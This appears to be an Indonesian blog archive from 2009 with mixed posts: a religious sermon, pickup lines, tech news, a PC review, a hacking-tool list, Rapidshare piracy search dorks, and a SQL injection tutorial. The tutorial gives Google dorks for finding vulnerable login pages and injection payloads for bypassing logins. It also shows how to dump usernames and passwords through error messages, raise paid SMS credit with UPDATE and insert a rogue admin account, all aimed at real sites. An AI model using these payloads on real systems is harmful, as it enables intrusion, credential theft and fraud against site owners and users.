File Comparasion,
Mass File Renamer,
Add Bytes to EXE,
Variable Encryption,
Simple File Encryption,
ASCII to Binary (vv),
Enigma, Password Unmasker,
Credit Card Number Validate and generate,
Create Local HTTP Server,
eXtreme UDP Flooder,
Web Server Scanner,
Force Reboot,
Webpage Info Seeker,
Bouncer,
Connection Tester,
Fake Mail Sender,
Bandwidth Monitor,
Remote Desktop Protocol Scanner,
MX Query,
Messenger Packet Sniffer,
API Spy,
DHCP Restart,
File Merger,
E-mail Extractor (crawler bot), Open FTP Scanner

Note :

hacking tool lainnya Bisa didapatkan informasinya? silahkan join
ke #persiwa
On IRC DALnet Server dan silahkan buka link yang ada pada topiknya.

Tips & Trik Download di Rapidshare

Tips & Trik Download Di Rapidshare :

1. To search for ebooks and documents in PDF format on Rapidshare:
pdf "rapidshare.de/files" site:rapidshare.de

2.To download movies and video files:
+inurl:avimpgwmv site:rapidshare.de

3. To download mp3 files from rapidshare:
+inurl:wmamp3 site:rapidshare.de

4.To download software, zipped files, programs from rapidshare:
+inurl:exerarzip site:rapidshare.de

Khutbah Terakhir Nabi Muhammad SAW

2009-09-27T21:51:00.000-07:00

Rasulullah SAW bersabda:"Semua dosa akan ditangguhkan oleh Allah SWT sampai hari Kiamat nanti apa saja yang Dia kehendaki, kecuali durhaka kepada orang tua, maka sesungguhnya Allah akan menyegerakan kepada pelakunya dalam hidupnya sebelum meninggal dunia" (Hadist Riwayat Hakim) Disampaikan pada 9 Dzulhijjah 10 H dilembah Uranah,Arafah.
Ya, saudara-saudaraku, perhatikan apa yang akan aku sampaikan, aku tidak tahu apakah tahun depan aku masih berada di antara kalian. Karenanya dengarkan baik-baik apa yang kukatakan ini dan sampaikan kepada mereka yang tidak dapat hadir saat ini. Ya, saudara-saudaraku, seperti kita ketahui, bulan ini, hari ini dan kota ini adalah suci, karenanya pandanglah kehidupan dan milik, setiap orang Muslim sebagai kepercayaan yang suci.

Kembalikan barang-barang yang dipercayakan kepadamu kepada pemilik yang sebenarnya. Jangan kau lukai orang lain sebagaimana orang lain tidak melukaimu.Ingatlah bahwa kamu akan bertemu dengan Allah SWT dan Dia akan memperhitungkan amalanmu dengan sebenar-benarnya.

Allah SWT telah melarangmu memungut riba, karenanya mulai saat ini dan untuk seterusnya kewajiban membayar riba dihapuskan. Waspadalah terhadap syaitan, demi keselamatan Agamamu. Dia telah kehilangan semua harapannya untuk membawa kalian pada kesesatan yang nyata, tapi waspadalah agar tidak terjebak pada tipuan halusnya. Ya, saudara-saudaraku, adalah benar kamu mempunyai hak tertentu terhadap isteri-isterimu, tapi mereka juga mempunyai hak atas dirimu. Apabila mereka mematuhi hakmu maka mereka memperoleh haknya untuk mendapat makanan dan pakaian secara layak.

Perlakukanlah isteri-isterimu dengan baik dan bersikaplah manis terhadap mereka, karena mereka adalah pendampingmu dan penolongmu yang setia. Dan adalah hakmu untuk melarang mereka berteman dengan orang-orang yang tidak kamu sukai, dan juga terlarang melakukan perzinahan. Ya, saudara-saudaraku, dengarkanlah baik-baik, sembahlah Allah, Shalat lima kali dalam sehari, laksanakan Puasa selama bulan Ramadhan,dan tunaikanlah Zakat,laksanakan ibadah Haji bila mampu.

Ketahuilah bahwa sesama Muslim adalah bersaudara. Kamu semua adalah sederajat.Tidak ada perbedaan satu terhadap yang lain kecuali Ketaqwaan dan Amal Shalih.
Ingatlah, suatu hari kamu akan menghadap Allah dan harus mempertanggung jawabkan semua amalanmu. Karena itu berhati-hatilah jangan menyimpang dari jalankebenaran setelah kepergianku nanti. Ya, saudara-saudaraku, tidak akan ada Nabi atau Rasul sesudahku dan tidak akan ada agama lain yang lahir. Karenanya simaklah baik-baik ya Saudaraku, dan pahamilah kata-kata yang kusampaikan kepadamu, bahwa aku meninggalkan dua pusaka, Al-Qur'an dan contoh-contohku sebagai As-Sunnah dan bila kalian mengikutinya tidak mungkin akan tersesat.
Siapa yang mendengarkan perkataanku ini wajib menyampaikannya kepada yang lain dan seterusnya dan mungkin yang terakhir memahami kata-kataku ini bisa lebih baik dari yang langsung mendengarkan.

Cara Hack Website

2009-09-27T21:37:00.000-07:00

Hallo Semua? Apakabar? Sorry Sudah Lama Offline? ini ada sedikit cerpen tentang cara hack sebuah Website ,tapi jangan di gunakan untuk kejahatan ya

::PREFACE::
============ =
Setelah banyaknya bug-bug yang bertebaran di jagad maya ini dari
yang namanya Unicode (masih ada lho sekarang) , RPC DCOM, XSS, VP-
ASP, dan bug-bug e-commerce lainnya kini yang lagi "trend" dalam
teknik hacking adlaah SQL Injection. dalam vol. 1 ini gw jelasin
cara ngisi sesuatu dengan perintah UPDATE

::DESCRIPTION: :
============ ===
SQL adalah bahasa pemrograman database yang banyak dipakai dalam
website, laporan keuangan, data-data pekerjaan, data mahasiswa, dan
lain lain. Diantara jenis lainnya MS-SQL adalah yang paling
terkenal, nah ternyata semua hal yang di jagad maya ini adalah
Vulnerable terhadap berbagai serangan, jadi SQL pun menjadi target
dalam hal ini.

::VULN::
========
yang akan gw bahas disini adalah MS-SQL yang Link ODBC dengan bahasa
pemrograman website ASP.

::Injection: :
==========
ok, setelah basa basi diatas gw mulai neh ..hehehe
untuk menginject sql ini anda perlu memperhatikan input-inputan
dalam situs itu yang sekiranya connect dengan SQL database situs
itu, atau bisa juga dengan menambah dari link url di kotak browser
anda semisal : ....asp/productID= 1'[sql query/string. untuk mencari
target yang vuln seperti kondisi diatas anda perlu mencarinya
yang .asp nah seperti biasa....GOOGLING! !! hehehe
key wordnya di google adalah :

1. allinurl:.co. id/login. asp
2. allinurl:.com/ admin.asp

semuannya itu banyak kombinasinya lainnya itu tergantung seberapa
jauh anda kreatif dalam mencari target di google.nah, kanre disini
gw bahas cara inject ke situs web to sms so searchnya : asp,web to
sms atw Send SMS, ASP

ok, misal kita dapet target www.apes.com, nah lihat dah ada inputan
yang masuk ke database itu ga, misalnya search product, member
login, atw admin login :) setelah itu kita isa inject pake
sql "umum" stringnya : ' or 1=1-- disini kita lihat kalau 1=1 itu
nialinya true dan tanda -- itu adalah marknya SQL kalau di C++/C
itu // _/* jadi setelah tanda Mark perintah selanjutnya tidak
dijalankan. nah klo beruntung dapet /admin.asp kita inject seperti
diatas itu bisa lho kita masuk sebagai admin! ini terjadi di situs
berita nasional di indonesia...

nah, klo ga dapet dir adminya yah kita cari kotak input yang kiranya
connect ke database situs itu, contoh isa di login, member, search,
dll. kita masukan debugging codenya : ' having 1=1--
jreeeeeng... ..ini musti diinget n kudu di pake setiap klo mo inject,
kita injet di :

userid : ' having 1=1--
Password :fuzk3

lalu....jreeeeeeng. ...ERROR! !!!
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ ODBC SQL Server Driver][SQL Server]
Column 'UserDB.userid' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP BY
clause.
member/log_right. asp, line 25

tuh ketahuan ada kolom UserDB.userid, klo udah gini gemana lagi
dungs? ok kita loop lagi sekarang kita inject : ' group by
UserDB.userid -- atau ' group by UserDB.userid having 1=1-- disini
kita gunain perintah group by untuk menggroup kolom ingin kita
lihat....ehehe. ..muncul error lagi, kali ini beda choi...
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ ODBC SQL Server Driver][SQL Server]
Column 'UserDB.userpass' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP BY
clause.
member/log_right. asp, line 25

nah sekarang kita tau apa aja kolomnya...hehehe
penerapan selanjutanya adalah misal situs itu adalah situs
pengiriman SMS sedunia yang kalo kita membernya kita bisa send sms
dari web, namun harus ada account yang digunakan untuk mengirim sms
itu, jadi account itu harus ada nilainya dan untuk itu kita harus
mengisinya dengan cara membelinya.. .ok ok NO CARDING HERE!!!
heheheh...so gemana neh??? karena kita ini orang-orang kere hehehe
so kita inject aja....sebelumnya kita harus jadi member kan gratis
ini daftarnya...
setelah kita jadi member dengan id : fuzk3 dan pass: Vero...kita log
ke situs itu dengan id kita, cari tahu string khusus yang digunakan
web itu untuk menghitung account sms kita, misalnya : cell
nah, inilah injectnya... .cari login inputan lagi misal /member.asp
nah disitu ada input box id dan pass...kita Inject dengan :
' UPDATE [namadatabase] SET [charkhusus] = [nilai] WHERE [namakolom]
= '[char_id]'- -
contoh :
' UPDATE UserDb set cell=100 where userid ='fuzk3'-- (inget neh)
sep, nah klo muncul error : userid not found kita isa cari input di
forgot password : dengan inputan sama...jreeen ketika di jalankan ga
ada error apa-apa..kembali login lalu...jreeeeeenng. ..liha cell mu
itu waduh 100 cell enak neh sms seratus kali....kiekiekie. ..SUKSES
BRO!!! :)

atau cara ke 2

::PREFACE::.
============
Kalau di Vol.1 dah dibahas teknik UPDATE di MS-SQL maka disini gw
jelasin cara INSERT dan UNION......rada ngejelimet neh.....makanya
kalau
baca artikel ini harus ada aer putih hyuehueh.... N disini gw juga
akan
kasih kilas balik sedikit untuk yang baru nyoba2 :) n penjelasan
yang
lebih detail

.::BODY::.
============

Sebelumnya tolong apabila browser kalian pada pake IE setting dulu
browsernya agar bisa melihat errornya. Setting di Tools-Internet
option-Advanced tab-Show friendly HTTP error messages. itu musti
dilakukan, kalau
tidak kalian tidak bisa lihat error messages yg keluar nanti.
OK, masih inget kan cara cari targetnya? kalau lupa lihat lagi
artikel
Vol.1 :)

Nah, klo dah dapet targetnya sekarang tinggal input SQL Querynya di
input boxnya :

www.target.com/ login.asp >> contoh target
www.target.com/ login.asp? err=Invalid_ password >> persan error yang
dapat di eksploitasi seperti biasa kalau ingin cari n tes vuln
engganya tuh
situs kita ketikan ' having 1=1-- di input box atau URL error tadi ,
contoh : www.target.com/ login.asp? err=' having 1=1-- then,....

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.UserID' is invalid in the select list because it is
not
contained in an
aggregate function and there is no GROUP BY clause

itu error messagesnya, kini kita group field UserID dari table
Users,
stringnya : ' group by UserID --
then,...

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.ClientName' is invalid in the select list
because it is not contained in either an aggregate function or the
GROUP BY clause.

muncul lagi error seperti itu....lalu lagi kita Group. Kini
stringnya
adalah ' group by
field1,field2 --
contoh : ' group by UserID,ClientName --
then,...

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.UserName' is invalid in the select list because it is
not
contained in

either an aggregate function or the GROUP BY clause.
trus group by lagi, hal ini kita lakukan (proses looping) sampai
semua
field kita

ketahui..... .makanya harus sabar, kalau engga ga bakal tembus :)
apabila sudah lama melakukan looping dan akhirnya ketika group
terakhir
kita lakukan dan tidak keluar error messagesnya maka error yang
terakhir adalah field yg terakhir.... .field table itu bisa panjang
sekali,
tergantung admin yang masangnya jadi susah kalau maen teabk2an
ajah....contoh field yang pernah gw temuin : ' group by
UserID,ClientName, UserName, Password, PhysicalAddress, PhoneNumber, Email
,
OperatingSystem, PrefferredGraphi cFormat
-- >> ada 9 field!!! jangan males dalam proses Looping :P

setelah dapet semua field, kini yang kita lakukan adalah mencari
siapa
aja user yang ada dalam table Users dan kolom UserName...
caranya? kita pake Union apa itu UNION??? union adalah perintah SQL
dimana ia dapat menggabungkan dua SELECT list tapi kalau pengen
gunain
Union ini kita harus tahu ada berapa field dalam table tadi

sintaksnya gini :
select field1, field2, … field_n
from tables
UNION
select field1, field2, … field_n
from tables;

nah biasanya dalam SQL QUERY di input box username itu mereka bikin
query select * from

Users where UserName =='"+login+" ' and Password='"+ pass"'"; nah
kalau
begitu kita masukin syntax sql union untuk melihat username : '
union
select min(UserName) ,1,1,1 from Users where username > 'a'--
jadi hasilnya : select * from Users where UserName ==' union select
min(UserName) ,1,1,1 from Users where username > 'a'--and
Password='"+ pass"'"; gitu kiranya, jadi nanti akan muncul error
messages lagi
yang akan menampilkan sebuah username lebih dari huruf a ,contoh:

Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'Agile' to a column of
data
type int. /

tuh lihat kan ada user dengan nama Agile...lalu looping lagi pake
string union tadi nanti akan muncul username2 lain....lalu bagaimana
dengan
passwordnya? ??
ok union beraksi kembali : ' union select min
(UserName),1, 1,1,1,1,1, 1,1
from Users where username > 'Agile'--
lalu akan muncul error yang memberitahukan passwordnya, contoh :

Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'Surfer' to a column of
data
type int. /

kalau dah gini kita bisa masuk dengan Username Agile dan passwordnya
Surfer...hehehe

selamat yah!
btw, kita juga ingin dong bisa INSERT databasenya. ....
caranya : karena ktia sudah tahu field2nya maka stringnya jadi : '
insert into table values
(field1,field2, ....,field_ n)--
misalkan ada field sebagai berikut :
'Users.UserID'
'Users. Username'
'Users.Password'
'Users.FName'
'Users.LName'
'Users.EmailAddress '
'Users.Administrato r'
itu berarti ada 7 field! Ok kita masukan menurut string tadi : '
insert
into Users values

(0,'lucifer' ,'lucifer' ,'lu','cid' ,'a@a.com',1)-- >> artinya kita
masukan id kita dalam

urutan 0, lalu username 'lucifer', password 'lucifer' Fname
(frontName)
itu 'lu',
Lname(LastName) sebagai 'cid', dan EmailAddress 'a@a.com'......
coba kita login dengan user buatan kita tadi....BINGO! selamat anda
berhasil menjebol

database situs target.....

rayuan gombal

2009-09-05T06:49:00.000-07:00

Cara asik merayu wanita pujaanmu versi humor.

Ayat- ayat cinta- Sebelumnya maafkan saya lupa sumber artikel ini,- jadi gak sempat saya cantumkan, memang sudah ada lama di kompie ku, tidak ingat lagi sumbernya darimana, dan saat lagi tegang ~~anuku~~ kok ketemu ini, ya di posting aja biar fresh baik sebagai motivasi - motivasi mengaet wanita yang seringkali jatuh cinta pada pandangan pertama.

(Dikereta)
Cowok : Mbak jangan pegangan sama besi kereta..
Cewek : Emang kenapa..?
Cowok : Kayaknya besinya kotor tuh.. pegangan sama aku aja… )

Cowok: Maaf mba, jangan terlalu lama duduk dikursi itu, pindah dideket saya aja
Cewek: Loh?? kenapa??
Cowok: Takut dikerubung semut.. soalnya mba manis..

Cowok : Mbak, orang tuanya pengrajin bantal ya..?
Cewek : Hah..!!!? bukan..Emang kenapa..?
Cowok : kok kalo deket sama mbak rasanya anget yach..

Cowok : Mbak bajunya enggak pernah disetrika ya..?
Cewek : Enak aja… emang kenapa..?
Cowok : biasanya kalo cewek udah cantik enggak perlu lagi nyetrika baju..

Cowok: “kamu itu seperti sendok…”
Cewek: “Kenapa?”
Cowok: “Karena kamu ngaduk-ngaduk perasaan aku…”

Cowok: “Kamu sekali-sekali nyuci piring dooonk”
Cewek: “Hah? emang kenapa ?”
Cowok: “Ini tangan kamu terlalu lembut…”

Cowok: “Kamu pasti enggak pernah maen bola ya..”
Cewek: “Iya laaah.. emang kenapa…?”
Cowok: “Soalnya kaki kamu bagus banget….”

Cowok: “Mbak punya uang koin ? Boleh minta ?”
Cewek: “Buat apa ?”
Cowok: “Aku udah janji sama ibu kalau aku akan menelepon dia bila aku jatuh cinta”

Cowo: Eh eh.. gw ada tebakan neh
Cewe: *excited* .. ok ok.. apa tebakannya
Cowo: Panda apa yang paling imut manis dan lucu?
Cewe: Semua panda mah imut kali..
Cowo: Engga.. ada satu yg paling ga ngebosenin..
Cewe: Nyerah deh..
Cowo: Panda-ngin kamu sepanjang hari..
Cewe: Ah.. abang ah.. (malumalubego)
Cowo: :D:D:D:D (cangengesan kaya kuda nyengir)

Jack : Dewi kok kamu msh marah sih ama aku ? katanya kamu selalu memberikan seribu maaf untukku ?
Dewi : Sapa suruh mau percaya ? kamu bodoh yah…
Jack : Emang aku ini bodoh…tapi aku bukan org bodoh yang menyukai dirimu..
Dewi : ………..

co: kemarin aku liat ada 1000 bintang di langit (ngomong sama cwe)
ce: ah yang bener??
co: iya bener, tapi sekarang tinggal 998 bintang…
ce: lho…kow bisa ilang dua?
co: iya 2 bintang yang ilang itu ternyata ada di dalam mata kamu (sambil liat matanya dalam2)

co: bapak kamu maling ya?
ce: ih….kow jahat sie bapak ku dibilang maling. kow gitu?
co: iya soalnya kamu pintar banget mencuri hatiku..

co: bapak kamu nahkoda ya?
ce: enggak kow….
co: tapi koq aku ingin sekali berlabuh di pelabuhan hatimu….

Lo tatap dia dengan penuh perasaan, trus
ketika dia nanya..
“Lo kenapa sih?”
Lo tanya ke dia..
“Sakit ga sih?”
cewe: Sakit kenapa?
Lo: Bidadari kaya lo, jatuh dr langit..
Sakit ga sih?

Co: “Hey Laura!! (Big Hug), I haven’t seen you FOREVER!!!! (Huge KISS) Wow, you’ve really have changed!!!
Ce: “Wait, I’m not Laura..”
Co: “What? Oh my God, You even changed your name!!!

co : say, 1 + 1 berapa ??
ce : 2 say
co : salah mustinya itu 1
ce : koq isa
co : karena nanti cinta ku dan cintamu akan melebur menjadi 1
ce : ah say bisa aje de :

co : gw lage bingung neh
ce : bingung napa ??
co : iya bingung,aja. .kok lo bisa ada disini ya sekarang ..??
ce : loh maksudnya ??? (tambah bingung juga )
co : iya, soalnya gw pikir bidadari tuh adanya di kahyangan
ce : *&^$^&

ce: bang, kalo aye jadi bunga, abang jadi apa?
co: abang pengen jadi matahari neng…
ce: kok ga jadi kumbang sih bang??
co: kan bunga ga bisa hidup tanpa matahari neng…
ce: mmm,, kalo aye jadi bulan, abang, jadi apa?
co: abang tetep pengen jadi matahari neng…
ce: kan matahari ma bulan ga isa ketemu bang??
co: kan bulan bisa bersinar karena sinar matahari neng..

co : kamu tahu apa definisi dari indah ??
ce : mm..yg jelas indah itu cantik…
co : well bener sih, tp menurut gw…indah itu adalah saat dimana kita ngga merasakan sedikit pun keburukan di dalamnya ..kmu pernah ngerasain yg begitu ???
ce : mungkin kalee ya
co : klo aku sering bgt…dan itu adalah saat….. diriku bersama dengan dirimu
ce : :malu

Apa anda mau menambahi ayat- ayat humor diatas? silahkan he..he. dicoba aja tips yang ini siapa tahu jadi playboy yahud.

Dilarang memakai traslate b.indonesia di komputer.

2009-09-05T06:46:00.000-07:00

Dilarang Menterjemahkan Bahasa Komputer ke dalam B. Indonesia - KondesingA - 10 Aug 2008 13:10

Do you know why?
Because it's dangerous, especially when it is taught in school. See samples below

1. Hardware = Barangkeras

2. Software = Baranglembut

3. Joystick = Batang gembira

4. Plug and play = Colok dan main

5. Port = Lubang

6. Server = Pelayan

7. Client = Pelanggan

Try to translate this :
(Silahkan coba untuk translate kalimat di bawah)

ENGLISH
The server provides a plug and play service for the
clients using either hardware and software joystick.
Just plug the joystick into the server port and enjoy it.

INDONESIA
Pelayan itu menyediakan layanan colok dan main untuk
pelanggannya dengan menggunakan batang gembira jenis keras atau lembut.
Cukup dengan memasukkan batang gembira itu ke lubang pelayan dan nikmati.

Groovy 1.6 Bahasa Skrip Java Dirilis

2009-09-05T06:45:00.001-07:00

Groovy, salah satu bahasa skrip untuk platform Java merilis versi 1.6 yang mengutamakan peningkatan kecepatan.

Berita ini diumumkan oleh Guillaume Laforge, kepala pengembangan Groovy di SpringSource yaitu perusahaan open source terkenal yang mengembangkan Spring Framework.

Berikut ini adalah fitur baru dan peningkatan pada Groovy 1.6:

Peningkatan kecepatan runtime secara signifikan
multiple assignments- optional return dalam blok if/else dan try/catch
transformasi AST dan semua anotasi trasnformasi seperti @Singleton, @Lazy, @Immutable, @Delegate dll
modul Grape dan sistem dependency dan transformasi @Grab
berbagai peningkatan Swing builder, terima kasih pada tim Swing/Griffon (http://griffon.codehaus.org)
peningkatan pada konsol Swing
Integrasi JMX builder
Mengikutkan JSR-223 scripting engine
Berbagai peningkatan metaprogramming, spt EMC DSL, metaclass per-instance bahkan untuk POJOs, dan runtime mixins

Anda dapat mendownload Groovy 1.6 pada http://groovy.codehaus.org/Download

Changelog dapat dilihat di:
http://jira.codehaus.org/browse/GROOVY?report=com.atlassian.jira.plugin.system.project:changelog-panel

Categories: Pemrograman
Tags: groovy, groovy 1.6, java, script, skrip

Flashdisk Berbentuk Kaset Tape

2009-09-05T06:43:00.001-07:00

Masih ingat donk dengan kaset tape recorder? Sekarang agaknya cukup sulit menemui kaset ini. Selain sudah jarang dipakai lagi, kapasitas kaset ini juga bisa dibilang kecil. Hal ini membuat orang malas memakainya.

Tapi kaset yang satu ini memiliki kapasitas yang lebih besar dari kaset yang lain. Jika kaset biasa paling-paling hanya mampu menyimpan 10 lagu, kaset ini mampu menyimpan sampai dengan 200 lagu. Kok bisa, alasannya adalah kaset ini sejatinya adalah sebuah flashdisk. Hanya bentuknya saja yang menyerupai kaset. Untuk ukuran 200 lagu, itu hanya dugaan saya. Anggap saja kaset tersebut memiliki kapasitas 1 GB dan 1 lagu MP3 berukuran 5 MB, maka ada 200 lagu yang dapat disimpan

PC Gear Elgrand 9314

2009-09-05T06:35:00.000-07:00

Dibanding merek PC lokal lainnya, nama PC Gear mungkin agak kurang terdengar. Padahal sebenarnya PC Gear sudah berkiprah di pasar komputer Indonesia sejak tahun 2003. Ini mungkin disebabkan mereka selama ini lebih menyasar segmen korporat, meski belakangan sudah berkembang ke segmen channel dan retail. Di bawah naungan Indomega Vision, PC Gear memiliki lini produk yang beragam mulai dari PC, server, dan peripheral komputer lainnya.

Kali ini kami berkesempatan menguji salah satu PC terbaru mereka, yaitu Elgrand 9314. Dari segmentasinya, seri Elgrand diperuntukkan untuk mereka yang membutuhkan PC yang tangguh dan mampu mengimbangi produktivitas kerja yang tinggi. Hal ini tercermin dari penggunaan Intel Core 2 Duo E4600 yang termasuk prosesor kelas menengah. Kerja prosesor tersebut dibantu memori berkapasitas 1GB (frekuensi 667MHz, timing 5-5-5-15). Sebenarnya PC ini menyediakan empat slot memori, namun pada unit yang kami terima cuma satu slot yang diisi. Alhasil sistem bekerja pada mode satu kanal, padahal chipset Intel G31 yang digunakan sebenarnya mendukung dua kanal. Chipset G31 ini juga menyediakan fasilitas grafis onboad Intel X3100, yang merupakan grafis onboard terbaik Intel saat ini.

Penampilan PC ini terkesan biasa saja. Panel depannya cuma diisi port USB dan audio, serta DVD Writer yang tersembunyi di balik panel penutup. Baru jika Anda menengok sisi belakang, terdapat fasilitas yang lebih lengkap, seperti USB yang mencapai USB (4 buah), Ethernet, serial, paralel, bahkan tersedia modem dial-up. Sayangnya tidak ada fasilitas FireWire di sini.

Ketika dinyalakan, suara kipas untuk mendinginkan interior PC cukup terdengar, meski tidak terasa mengganggu. Sistem pendingin ini mampu membuat prosesor bekerja di temperatur 38^oC pada kondisi idle (seperti yang terbaca melalui aplikasi Everest Home Edition). Meski prosesor Core 2 Duo E6650 memang tergolong dingin, kemampuan Gear menjaga temperaturnya pada angka itu menunjukkan keefektifan sistem pendingin yang digunakan.

Ini membuat kami tergoda untuk melakukan sedikit overclock dengan cara menaikkan FSB. Kami naikkan sedikit demi sedikit FSB dari angka Mhz, dan sistem tetap stabil ketika menyentuh angka 400MHz. Ini membuat prosesor bekerja dari posisi awal.. Pada kecepatan ini, temperatur prosesor tercatat di angka 52^oC, sehingga masih mungkin untuk ditingkatkan lagi. Ini menunjukkan sistem yang dibangun Gear terbilang tangguh dan fleksibel untuk diangkat.

Ketika mencoba untuk mengetik, kami cukup merasa nyaman dengan keyboard-nya. Tombolnya terasa empuk, sehingga kami tidak kesulitan mencapai kecepatan ketik standar kami. Layar 15 inci yang disertakan juga memiliki kualitas bagus, terlihat dari ketajaman dan brightness-nya yang tinggi. Sebagai catatan tambahan, PC Gear menjamin monitor ini bebas dari pixel mati (dead pixel) saat Anda membelinya.

***

Jika ditilik, tidak ada yang eksotis dari Elgrand 9314 ini. Tampangnya sederhana, fasilitasnya standar, dan performanya juga tidak terbilang istimewa. Namun sesuai janji, Elgrand 9314 mampu menunjukkan kerjanya yang tangguh; terlihat dari tidak bermasalah saat di-overclock. Harganya yang sekitar US$ 569 (termasuk monitor LCD 15 inci) juga terbilang kompetitif. (Wisnu Nugroho)

Plus : Kualitas layar bagus; harga terjangkau

Minus: Tampang sederhana; tanpa FireWire; Ethernet belum kelas Gigabit

Skor Penilaian

Kinerja : 4

Fasilitas : 4

Penggunaan : 4

Harga : 4

Skor Total : 4

Hasil Pengujian

Menggunakan prosesor Intel E4600, performa Elgrand 9314 terlihat biasa saja. Skor Sysmark 2007 misalnya, kurang dari 100; yang berarti masih kalah cepat dibanding PC referensi Sysmark 2007 yang menggunakan Intel Core 2 Duo E6300, memori 1GB, dan VGA nVidia 7100GS. Dan karena menggunakan grafis onboard, skor 3DMark 2006 juga biasa saja.

Pengujian	PC Gear Elgrand 9314
Sysmark 2007	94
PCMark Vantage	2248
3DMark 2006	215
Cinebench	3 menit 14 detik
Encoding Video	16 menit 3 detik
Encoding Audio	2 menit 59 detik

Spesifikasi

Jenis casing		Micro Tower
Prosesor		Intel Core 2 Duo E4600 (2,4 Hz, FSB 1066MHz)
Memori		1GB, DDR2-667
	Chipset		Intel G31 Express Chipset
	Kartu Grafis		Intel GMA X3100 320MB
	Harddisk		160GB SATA II 7200RPM
	Optical drive		DVD Writer
	Fasilitas		LAN, USB (6), audio; port paralel + serial, Modem dial-up, VGA-out.
	Layar/Monitor		15,1 inci, 1024x768 pixel
	Kartu suara		Realtek ALC662
	Sistem Operasi		Windows Vista Ultimate
	Bobot		Tidak diketahui
	Garansi		1 tahun
	Situs Web		www.gear-computer.com
	Harga kisaran*		US$ 569

Isra Mi'raj

2009-08-09T04:19:00.001-07:00

Isra Mi'raj Nabi Muhammad SAW (Shallallahu Alaihi wa Sallam) merupakan salah satu peristiwa penting bagi umat Islam karena pada peristiwa ini Nabi Muhammad Shallallahu Alaihi wa Sallam mendapat perintah untuk menunaikan shalat lima waktu sehari semalam.

Isra Mi'raj terjadi pada periode akhir kenabian di Makkah sebelum Rasulullah Shallallahu Alaihi wa Sallam hijrah ke Madinah. Menurut al-Maududi^[1] dan mayoritas ulama,^[2] Isra Mi'raj terjadi pada tahun pertama sebelum hijrah, yaitu antara tahun 620-621 M. Menurut al-Allamah al-Manshurfuri, Isra Mi'raj terjadi pada malam 27 Rajab tahun ke-10 kenabian, dan inilah yang populer. Namun demikian, Syaikh Shafiyurrahman al-Mubarakfuri^[3] menolak pendapat tersebut dengan alasan karena Khadijah radhiyallahu anha meninggal pada bulan Ramadhan tahun ke-10 kenabian, yaitu 2 bulan setelah bulan Rajab. Dan saat itu belum ada kewajiban shalat lima waktu. Al-Mubarakfuri menyebutkan 6 pendapat tentang waktu kejadian Isra Mi'raj. Tetapi tidak ada satupun yang pasti. Dengan demikian, tidak diketahui secara persis kapan tanggal terjadinya Isra Mi'raj.

Peristiwa Isra Mi'raj terbagi dalam 2 peristiwa yang berbeda. Dalam Isra, Nabi Muhammad Shallallahu Alaihi wa Sallam "diberangkatkan" oleh Allah SWT dari Masjidil Haram hingga Masjidil Aqsa. Lalu dalam Mi'raj Nabi Muhammad SAW dinaikkan ke langit sampai ke Sidratul Muntaha yang merupakan tempat tertinggi. Di sini Beliau mendapat perintah langsung dari Allah SWT untuk menunaikan shalat lima waktu.

Bagi umat Islam, peristiwa tersebut merupakan peristiwa yang berharga, karena ketika inilah shalat lima waktu diwajibkan, dan tidak ada Nabi lain yang mendapat perjalanan sampai ke Sidratul Muntaha seperti ini. Walaupun begitu, peristiwa ini juga dikatakan memuat berbagai macam hal yang membuat Rasullullah SAW sedih.

Makna 17 Agustus Bagi Seorang Anak Bangsa

2009-08-09T04:05:00.000-07:00

Sulit situasinya saat ini jika anda berniat baik memberikan pemikiran jangan putus asa jika itu dianggap khayalan. Jika anda memotivasi diri sendiri termasuk komunitas anda jangan kecewa jika dikira anda akan menjadi anggota Dewan atau terkait dengan partai politik.

Begitu juga jika anda mengkritik apakah kontruktif atau destruktif jangan heran jika dikatakan bahwa anda sedang menuliskan uneg-uneg anda. Terakhir jika anda sukses karena menciptakan produk atau jasa jangan sedih jika tiba-tiba semua orang ramai-ramai meniru hasil karya anda dan akhirnya jika anda tidak beruntung anda bangkrut. Itu situasi di indonesia saat ini kita jangan menyerah dan kehilangan akal tapi harus bangkit.

I. Ada Apa dengan Indonesia

Pertama tentu bersyukur atas Kemerdekaan ini dan yang kedua tentunya kemerdekaan ini tidak boleh lenyap dari muka bumi Indonesia, walau banyak pihak sudah mengingatkan bahwa bahaya perpecahan dan hilangnya kedaulatan negeri Indonesia.

Secara sederhana jika kita melek sedikit nyata benar tekanan pada kita semua itu memang nyata adanya. TKW dari negeri ini bukan hanya dipukuli tapi diperkosa bahkan dibunuh tapi kita tetap mengirimkan dan melihat hat itu sebagai pilihan karena betapa tertutupnya lapangan kerja untuk para saudara kita akibat dari terlalu banyaknya keluarga tidak berpenghasilan dn sangat rendah penghasilan maka bekerja di luar negeri merupakan sebuah pilihan. Eropa dan Aeab Saudi dengan enteng berusaha melarang Garuda terbang ke wilayahnya walau masih dalam tahapan coba-coba, dan kelihatannya sedang dinegoisasi pemerintah China melarang berbagai produk dari negeri ini untuk tidak memasuki negaranya, Travel warning diberikan kepada indonesia oelh berbagai negara, bahkan negara ini juga dituduh sebagai sarang teroris. Belum lagi kalau anda sudah s2 disini juga tetap perlu ngambil s2 lagi diluar negeri terutama pada neera tertentu karena begitulah dunia pendidikan kita juga. Itu posisi negeri ini sekarang.

Kita tidak perlu juga hanya malu dan menyesal walaupun dianggap sebagai negeri no 3 terkorup bahkan mungkin jika tidak menyuap menduduki negeri terkorup, dianggap sebagai negeri penghasil co2 terbesar didunia dan pelanggar HAM. Hampir semua yang jelek dan buruk mampir di negeri ini. Pertanyaannya apakah negara lain juga tidak seperti Indonesia? Atau kita tidak pandai mengelola informasi di negeri ini? Yang pasti daripada mempertanyakan lebih baik kita memperbaikinya.

